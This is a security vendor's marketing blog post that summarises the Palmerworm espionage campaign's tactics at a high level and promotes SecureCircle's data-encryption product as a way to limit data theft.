Preventing Palmerworm Espionage
December 4, 2020
An espionage group known as Palmerworm used new malware to attack targets worldwide, including companies in media, finance, construction, and engineering in the US, Japan, Taiwan, and China.
In some cases, Palmerworm maintained a presence on compromised networks for more than a year using 'living-off-the-land' tactics. These attacks take advantage of legitimate software not to raise suspicion that something might be wrong. The malware also uses stolen code-signing certificates in the payloads to make the malware look legitimate.
Researchers cannot see what Palmerworm is exfiltrating from their victims, but the group is considered an espionage group and is likely motivated by stealing information from targeted companies.
The Palmerworm attack is similar to standard ransomware in which the thieves steal your data and ask for a ransom to block releasing your data to the public. In this case, the difference is the attackers already see value in your data and know-how to monetize it without asking for a ransom. An attack of this nature could go on indefinitely if not caught.
SecureCircle will not prevent the attackers from installing malware and exfiltrating data from the company. There are End Point Detection and Response (EDR) solutions that will avert suspicious attacks. One of the known victims was able to detect the attack within two days with proper security in place.
SecureCircle will secure your data so your confidential internal data will not be accessible by the attackers or anyone in the public should the files be released. Data is persistently secured at all times, including at rest, in transit, and in use. Even if files transfer outside of the company, unauthorized users will never access the encrypted data.
In the Palmerworm case, the attackers used typical applications for reconnaissance, compression, and remote transfer. WinRAR was used to compress data to make the data easier to transfer. Putty was used to open remote connections and transfer the data. With SecureCircle, these applications would not be allowed to access the encrypted data within files by default. These applications typically move data. Similar applications like email clients and web browsers would also not have permission to read the secured data. Applications that are not enabled to view encrypted data can only move encrypted data. Applications such as Excel would have permission to read the secure data. SecureCircle can provide granular permissions beyond devices and users. SecureCircle can authorize access to secure data by application and network as well.
Another significant benefit of SecureCircle is the rapid time to deployment. SecureCircle is transparent to end-users and doesn't change user or business workflow, unlike other security solutions. Without impacting users, companies can secure all their data by default rather than selecting only the most crucial data. By not having to discover or classify data, companies implement SecureCircle quickly by defining data sources such as SaaS applications, file servers, or specific applications on user devices such as CAD, Adobe, or source code applications.
SecureCircle helps eliminate data breaches from malicious external attacks such as Palmerworm and malicious and accidental insiders.
Prevent Data Breaches
Let’s discuss your unique cybersecurity challenges and needs.
If you want to notified when we post the newest content about mitigating insider threats, data breaches, protecting source code, and DASB, please subscribe to our SecureCircle newsletter.